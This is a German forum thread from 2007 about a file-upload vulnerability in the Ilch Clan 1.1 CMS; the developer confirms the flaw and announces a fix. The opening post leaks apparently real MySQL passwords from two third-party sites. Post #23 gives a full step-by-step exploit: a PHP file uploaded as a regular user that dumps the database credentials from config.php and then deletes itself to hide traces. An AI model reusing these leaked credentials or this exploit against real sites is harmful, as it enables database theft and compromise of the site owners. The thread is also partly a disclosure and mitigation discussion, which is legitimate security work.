ilch Forum » Ilch Clan 1.1 » Kritik und Verbesserungen » script total unsicher

Geschlossen
  1. #1
    User Pic
    white-hat Mitglied
    Registriert seit
    15.01.2007
    Beiträge
    24
    Beitragswertungen
    0 Beitragspunkte
    ich habe eine schwerwiegende Sicherheitslücke im Ilchscript entdeckt die es Angreifer ermöglicht zugriff auf die gesamte MySQL datenbank zu ermöglichen. Als beweis möchte ich einige Daten veröffentlichen.

    <center>
    von:
    odd-clan.penguinfriends.org/

    MySQL Daten:

    host: *zensiert*
    username: *zensiert*
    passwort: lkMsL8dmS
    Datenbank: odd-clan
    präfix: ic1_

    von:
    [url]
    externer Link[/url]

    MySQL Daten:

    host: *zensiert*
    username: *zensiert*
    passwort: yogafine112
    Datenbank: usr_web88_1
    präfix: ic1_

    </center>

    ich habe die Usernamen zensiert um die Pages vor angreifern zu schützen. Wer es immer noch nicht glaubt oll bitte die URL seiner Page hier posten und mir 2 minuten geben um sein PW etc hier zu posten

    MfG Neo

    betroffene Homepage: alle!
    0 Mitglieder finden den Beitrag gut.
  2. #2
    User Pic
    SLJ Hall Of Fame
    Registriert seit
    18.05.2004
    Beiträge
    15.492
    Beitragswertungen
    3 Beitragspunkte
    slj.sl.funpic.de bitte per pm,..

    mfg
    SLJ
    externer Link
    Ilch 1.0.4 PHP 7.0 und PDO Fähig na klar lächeln
    0 Mitglieder finden den Beitrag gut.
  3. #3
    User Pic
    Rock@wulf Hall Of Fame
    Registriert seit
    03.06.2004
    Beiträge
    3.282
    Beitragswertungen
    239 Beitragspunkte
    jup ist mir auch schon aufgefallen, das man sehr leicht andiese "Daten" rankommt. geht irgendwie mit nem php source viewer , der macht halt die datei aus und da dort die sachen klartext drin stehen, naja ist halt bloed.
    ist aber nicht wirklich ein sicherheitsbug sondern ein Punkt, der in sachen sicherheit schnellstens verbessert werden sollte, indem man ja kp die daten irgendwie verschlüsselt
    Meine Postings repräsentieren meine Meinung wenn nicht anders gekennzeichnet.
    MFG Rock@wulf
    0 Mitglieder finden den Beitrag gut.
  4. #4
    User Pic
    white-hat Mitglied
    Registriert seit
    15.01.2007
    Beiträge
    24
    Beitragswertungen
    0 Beitragspunkte
    man brauch die daten nich verschlüsseln sondern nur die sicherheitslücke schließen. Verschlüsselungen nnützen gar nischt wenn man an die verschlüsselungen rannkommt und den Key weis womit die datei verschlüsselt wurde...außerdem is das verschlüsseln viel zu aufwendig und unnötig für so ein kleines script
    0 Mitglieder finden den Beitrag gut.
  5. #5
    User Pic
    white-hat Mitglied
    Registriert seit
    15.01.2007
    Beiträge
    24
    Beitragswertungen
    0 Beitragspunkte
    @SLJ hast du meine PN erhalten?
    0 Mitglieder finden den Beitrag gut.
  6. #6
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Meine Frage, liegts am Script selbst, oder an einer PHP Sicherheitslücke, die du mit irgendeinem Programm/Website ausnutzt?
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    0 Mitglieder finden den Beitrag gut.
  7. #7
    User Pic
    white-hat Mitglied
    Registriert seit
    15.01.2007
    Beiträge
    24
    Beitragswertungen
    0 Beitragspunkte
    ne es ist ein Fehler in der Programmierung
    0 Mitglieder finden den Beitrag gut.
  8. #8
    User Pic
    Rock@wulf Hall Of Fame
    Registriert seit
    03.06.2004
    Beiträge
    3.282
    Beitragswertungen
    239 Beitragspunkte
    dann weißt du sicherlich auch wie man ihn behebt?

    wenn ja lass mal hören
    Meine Postings repräsentieren meine Meinung wenn nicht anders gekennzeichnet.
    MFG Rock@wulf
    0 Mitglieder finden den Beitrag gut.
  9. #9
    User Pic
    white-hat Mitglied
    Registriert seit
    15.01.2007
    Beiträge
    24
    Beitragswertungen
    0 Beitragspunkte
    rein theoretisch müsste der Fehler auch auf der Page sein glaube ich allerdings is die architektur hier etwas anders -.-
    0 Mitglieder finden den Beitrag gut.
  10. #10
    User Pic
    Oldemuche Mitglied
    Registriert seit
    11.04.2006
    Beiträge
    1.027
    Beitragswertungen
    44 Beitragspunkte
    white-hat ich finde es Nett das du das hier postest.
    Andere würden sich damit ein spaß machen und die mysql daten zerstören!


    Zuletzt modifiziert von Oldemuche am 21.01.2007 - 19:47:30
    0 Mitglieder finden den Beitrag gut.
  11. #11
    User Pic
    dastiii Mitglied
    Registriert seit
    27.12.2005
    Beiträge
    2.354
    Beitragswertungen
    84 Beitragspunkte
    Ach du kacke...

    Recht hat er!

    Nach stundemlangen googlen bin ich drauf gestoßen!
    Gibt extra ein Videotutorial dafür

    Das werde ich hier natürlich nicht veröffentlichen, ansonsten wären morgen keine ilch pages mehr da!

    Am besten schützt man sich wohl, wenn man die user uploads ausstellt!

    Per PM gibts mehr infos! Aber nur an vertrauenswürdige!


    Zuletzt modifiziert von DaStIaC am 21.01.2007 - 20:35:37
    0 Mitglieder finden den Beitrag gut.
  12. #12
    User Pic
    HeX Hall Of Fame
    Registriert seit
    14.01.2006
    Beiträge
    2.113
    Beitragswertungen
    1 Beitragspunkte
    also wenn es mit nem php source viewer funktionieren soll, dann wäre ja fast alle scipte betroffen, denn viele haben ein config.php wo die mysql daten drinn stehen.


    wundert mich auch das dieser punkt keinem in den ganzen vorigen versionen aufgefallen ist.

    DaStIaC ich hätte interre, schicke mir mal ne pm mit link zum video
    Discite moniti!
    www.pixelbash.de
    0 Mitglieder finden den Beitrag gut.
  13. #13
    User Pic
    Rock@wulf Hall Of Fame
    Registriert seit
    03.06.2004
    Beiträge
    3.282
    Beitragswertungen
    239 Beitragspunkte
    ja das mit dem source viewer is was komplizierter als das was hier angestellt worden ist...

    und ob das mit dem source viewer noch geht ist fraglich das lezte mal wars 1.03 als ich von gelesen habe
    Meine Postings repräsentieren meine Meinung wenn nicht anders gekennzeichnet.
    MFG Rock@wulf
    0 Mitglieder finden den Beitrag gut.
  14. #14
    User Pic
    Mairu Coder
    Registriert seit
    16.06.2006
    Beiträge
    15.334
    Beitragswertungen
    386 Beitragspunkte
    Mich würde es auch interessieren, falls du mich also als vertrauenswürdig erachtest zwinker
    Und auch immer mal ein Blick auf die FAQ werfen. | Mairus Ilchseite
    0 Mitglieder finden den Beitrag gut.
  15. #15
    User Pic
    Nero Hall Of Fame
    Registriert seit
    12.11.2005
    Beiträge
    987
    Beitragswertungen
    0 Beitragspunkte
    es ist ein source viewer! wie man den aber hochbekommt ist mir unklar, aussert man hat ein paar upload funktionen von dem Ilch stantart CMS modifiziert!

    @white-hat
    mach bitte die php dateien unschädlich, bevor du den link veröffentlichst!!!

    Mfg Nero


    Zuletzt modifiziert von Nero am 21.01.2007 - 22:30:50
    ilch-Portal coming soon lachen

    0 Mitglieder finden den Beitrag gut.
  16. #16
    User Pic
    SLJ Hall Of Fame
    Registriert seit
    18.05.2004
    Beiträge
    15.492
    Beitragswertungen
    3 Beitragspunkte
    Ja also bei 1.0.5 ist es wohl nicht möglich an die mysql daten ran zu kommen,... wundert mich warum das bei 1.1 dann geht das baut auch darauf auf !
    externer Link
    Ilch 1.0.4 PHP 7.0 und PDO Fähig na klar lächeln
    0 Mitglieder finden den Beitrag gut.
  17. #17
    User Pic
    manuel ilch-Gründer
    Registriert seit
    22.03.2003
    Beiträge
    4.260
    Beitragswertungen
    4 Beitragspunkte
    ne es geht in jedem standard ilchClan 11 skript.
    es ist ein fehler von mir im skript, der erst in 1.1 rein gekommen ist.
    ich habe gerade ein update in die test phase geschickt was das problem behebt.
    ich werde das update morgen veröffentlichen.
    bis morgen sollte man die upload funktion kurz ausschalten.
    0 Mitglieder finden den Beitrag gut.
  18. #18
    User Pic
    thbreidenbach Mitglied
    Registriert seit
    05.05.2006
    Beiträge
    348
    Beitragswertungen
    0 Beitragspunkte
    reicht es heute, den upload mit has_right (-3) ab Member verfügbar zu machen?

    Gruss Breiti
    -->leider kein "ilcher" mehr...
    externer Link
    0 Mitglieder finden den Beitrag gut.
  19. #19
    User Pic
    timosy Mitglied
    Registriert seit
    26.11.2006
    Beiträge
    175
    Beitragswertungen
    0 Beitragspunkte
    des kommt halt drauf an wie du deinen membern vertraust zwinker

    aber wie sCoRpIoN sagt ist doch kein prob den mal für ein tag off zu haben


    Zuletzt modifiziert von timosy am 21.01.2007 - 23:26:14
    0 Mitglieder finden den Beitrag gut.
  20. #20
    User Pic
    sCoRpIoN Mitglied
    Registriert seit
    03.03.2005
    Beiträge
    1.883
    Beitragswertungen
    0 Beitragspunkte
    deaktviere den upload doch einfach bis morgen;

    mfg
    scorp
    free-design: externer Link

    --## externer Link ##--
    0 Mitglieder finden den Beitrag gut.
  21. #21
    User Pic
    [OPA]Tzaphkiel Mitglied
    Registriert seit
    21.01.2007
    Beiträge
    2
    Beitragswertungen
    0 Beitragspunkte
    Hallöchen lächeln
    Auf unserer Seite www.opafun.de ist folgender Text aufeinmal....
    BITTE externer Link DIESE DATEI LÖSCHEN! und die USER-UPLOADS VORÜBERGEHEND AUSSCHALTEN!

    Dieses Habe ich gelöscht und alles ersteinmal gesperrt! Doch wie bekomm ich diesen Text nun weg da dieser die komplette Seite verzieht zumindestens im IE traurig !
    Kann mir jemand helfen??!!

    P.S. Danke für die benachrichtigung!

    Liebe Grüße [OPA]Tzaphkiel
    0 Mitglieder finden den Beitrag gut.
  22. #22
    User Pic
    [OPA]Tzaphkiel Mitglied
    Registriert seit
    21.01.2007
    Beiträge
    2
    Beitragswertungen
    0 Beitragspunkte
    Ok hat sich erledigt! Habs selber gefunden und konnte es löschen lächeln
    Danke für die Warnung! Was sollte ich denn nun als nächstes tun?
    Passwörter und so weiter wieder ändern?!
    Wär cool wenn ihr mir weiterhelfen könnt!

    Liebe Grüße [OPA]Tzaphkiel
    0 Mitglieder finden den Beitrag gut.
  23. #23
    User Pic
    white-hat Mitglied
    Registriert seit
    15.01.2007
    Beiträge
    24
    Beitragswertungen
    0 Beitragspunkte
    also der Fehler liegt bei den Useruplloads

    hier ne Anleitung:

    also der Fehler liegt in der Programmierung...ich kann als registrierter User Dateien auf den Server laden unter Downloads nach dem hochladen muss ein Mod oder Admin sie zwar aktivieren aber es reicht ja das sie auf dem Server drauf sind....


    1. registrieren

    2. Downloadpage aufrufen

    3. php-datei mit folgendem Inhalt hochladen(name ist hier "xploit.php"):

    <?php
    //ilchscript-hack by neo aka white-hat
    
    include("../../../includes/config.php");
    
    echo "<center>";
    
    echo "<br><br><br>MySQL Daten: <br><br>";
    echo "host: ";
    echo DBHOST;
    echo "<br>";
    echo "username: ";
    echo DBUSER;
    echo "<br>";
    echo "passwort: ";
    echo DBPASS;
    echo "<br>";
    echo "Datenbank: ";
    echo DBDATE;
    echo "<br>";
    echo "präfix: ";
    echo DBPREF;
    echo "<br><br><br>";
    
    echo "</center>";
    
    unlink("xploit.php");
    
    if(is_file("xploit.php")){
    	echo "<br><br><center>Datei wurde nicht gelöscht !!!";
    }else{
    	echo "<br><br><center>Datei wurde gelöscht - Spuren wurden verwischt";
    }
    echo "<br><br><strong>Scripted by Neo</stron></center>";
    ?>


    4.Datei wurde hochgeladen -> Fehlermeldung erscheint manchmal das die Dateiendung nicht hinhaut -> Datei wurde aber trotzdem geuppt

    5. URL aufrufen:

    www.victim.de/include/downs/downloads/user_upload/xploit.php


    6. Script gibt alle MySQL Daten aus und löscht sich selbst



    ist eigentlich recht billig


    Also bitte einfach die Dateiendungen die NICHT zugelassen sind einfach nicht uploaden lassen !!! Wenn ihr noch Coder braucht oder Security Tester sagt bescheid


    Zuletzt modifiziert von white-hat am 22.01.2007 - 00:19:31
    0 Mitglieder finden den Beitrag gut.
  24. #24
    User Pic
    Nero Hall Of Fame
    Registriert seit
    12.11.2005
    Beiträge
    987
    Beitragswertungen
    0 Beitragspunkte
    ich frag mich nur gad, bei welchem dieser typen die php datei akzeptiert wird:

    $type == 'application/zip' OR
                 $type == 'application/rar' OR
                 $type == 'application/x-rar-compressed' OR
                 $type == 'application/x-zip-compressed' OR
              $type == 'application/x-rar' OR
              $type == 'application/x-zip' OR
              $type == 'application/octet-stream'


    Mfg Nero
    ilch-Portal coming soon lachen

    0 Mitglieder finden den Beitrag gut.
  25. #25
    User Pic
    white-hat Mitglied
    Registriert seit
    15.01.2007
    Beiträge
    24
    Beitragswertungen
    0 Beitragspunkte
    das kmische is ja das die php datei upgeloadet wird manchmal aber angezeigt wird das der dateityp nicht korrekt ist --> Die datei is dennoch hochgeladen ? muss mir das script mal genauer anschauen woran das liegt hab keine zeit mehr muss heute zur schule -.-
    0 Mitglieder finden den Beitrag gut.
  26. #26
    User Pic
    white-hat Mitglied
    Registriert seit
    15.01.2007
    Beiträge
    24
    Beitragswertungen
    0 Beitragspunkte
    @ Oldemuche

    wer sagt denn das ich noch net meinen spass hatte ^^


    Das SICHERSTER für alle ilchscript-benutzer wäre erstmal den MemberUpload zu deaktivieren wenn das geht


    Zuletzt modifiziert von white-hat am 22.01.2007 - 12:20:58
    0 Mitglieder finden den Beitrag gut.
  27. #27
    User Pic
    SLJ Hall Of Fame
    Registriert seit
    18.05.2004
    Beiträge
    15.492
    Beitragswertungen
    3 Beitragspunkte
    Also wenn ich Ehrlich bin !! Hab wir vor nichtmal 1 Woche über dieses Probleme schon "Intern" geredet,...

    Aber egal,... du warst der erste user der uns drauf aufmerksam gemacht hat!

    Also auf meinem htttp://slj.sl.funpic.de da ist 1.0.5 drauf dort gibst den fehler wie manuel sagte nicht !

    Warum du dennoch mein pw gefunden hast war mein fehler,... und kein Bug im Script !

    Und in 1.0.4 (Bei mir zumindest) gibst den fehler auch nicht,... ich habe es extra nochmals überprüft,...

    mfg
    SLJ
    externer Link
    Ilch 1.0.4 PHP 7.0 und PDO Fähig na klar lächeln
    0 Mitglieder finden den Beitrag gut.
  28. #28
    User Pic
    Rock@wulf Hall Of Fame
    Registriert seit
    03.06.2004
    Beiträge
    3.282
    Beitragswertungen
    239 Beitragspunkte
    dafür kann man in 1.04 -1.05 ganz leicht die daten des users zu knacken gibts auch ein exploit
    Meine Postings repräsentieren meine Meinung wenn nicht anders gekennzeichnet.
    MFG Rock@wulf
    0 Mitglieder finden den Beitrag gut.
  29. #29
    User Pic
    Wega Mitglied
    Registriert seit
    26.12.2006
    Beiträge
    95
    Beitragswertungen
    0 Beitragspunkte
    Na da gehts ja, dass ich die Uploadfunktion von Anfang an deaktiviert hatte.

    Aber mal ne Frage, falls jemand bereits alles ausgelesen hat und von allen Usern z.B. Kenntwörter ändert.
    Dann kann sich keiner mehr anmelden. Auch keine Admins.

    Wie kommt man dann eigentlich noch zu den Adminrechten?
    Gibts denn da ne Möglichkeit? Nicht das ich das jetzt alles wissen will, mich interessiert nur, obs im Notfall geht. lächeln

    Mfg

    @Wega
    0 Mitglieder finden den Beitrag gut.
  30. #30
    User Pic
    SLJ Hall Of Fame
    Registriert seit
    18.05.2004
    Beiträge
    15.492
    Beitragswertungen
    3 Beitragspunkte
    die frage ist halt was man davon hat ? auser das ich kurz nen backup von letzer nacht aufspiele,... zwinker bzw. du meinst an den md5 code zu kommen ? fals ja da gibs ne möglichkeit den zusätzlich zu verschlüsseln so das man das nicht knacken kann,...
    externer Link
    Ilch 1.0.4 PHP 7.0 und PDO Fähig na klar lächeln
    0 Mitglieder finden den Beitrag gut.
Geschlossen

Zurück zu Kritik und Verbesserungen

Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten